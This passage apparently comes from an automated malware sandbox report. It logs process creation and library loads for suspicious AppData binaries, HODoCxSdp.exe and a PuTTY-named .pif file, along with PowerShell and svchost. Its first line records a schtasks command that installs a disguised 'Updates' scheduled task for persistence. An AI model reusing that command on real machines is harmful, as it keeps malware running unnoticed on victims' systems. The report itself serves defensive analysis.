Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HODoCxSdp" /XML "C:\Users\user\AppData\Local\Temp\tmpF9EC.tmp"
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process created: C:\Users\user\AppData\Roaming\HODoCxSdp.exe "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Process created: C:\Users\user\AppData\Roaming\HODoCxSdp.exe "C:\Users\user\AppData\Roaming\HODoCxSdp.exe"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\PuttyTest777.pif	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\HODoCxSdp.exe	Section loaded: ucrtbase_clr0400.dll
